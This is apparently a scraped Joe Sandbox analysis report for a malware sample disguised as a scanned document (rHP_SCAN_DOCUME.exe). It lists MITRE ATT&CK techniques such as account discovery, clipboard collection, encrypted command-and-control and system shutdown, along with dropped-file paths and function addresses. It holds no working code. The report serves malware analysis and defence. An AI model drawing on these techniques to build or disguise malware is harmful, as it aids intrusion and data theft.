Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report rHP_SCAN_DOCUME.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\78-E5648

C:\Users\user\AppData\Local\Temp\fricandeaux

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Windows Analysis Report
rHP_SCAN_DOCUME.exe

Function 008142DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Function 008142A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Function 00852BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Function 00812CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Function 0085065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Function 0081344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Function 00812B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Function 00813170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Function 01073E68 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Function 00812C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Function 01073C28 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 149
fileCOMMON

Function 00813B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
registryCOMMON

Function 01072B18 Relevance: 6.7, APIs: 4, Instructions: 720
processthreadCOMMON

Function 00813923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94
windowCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre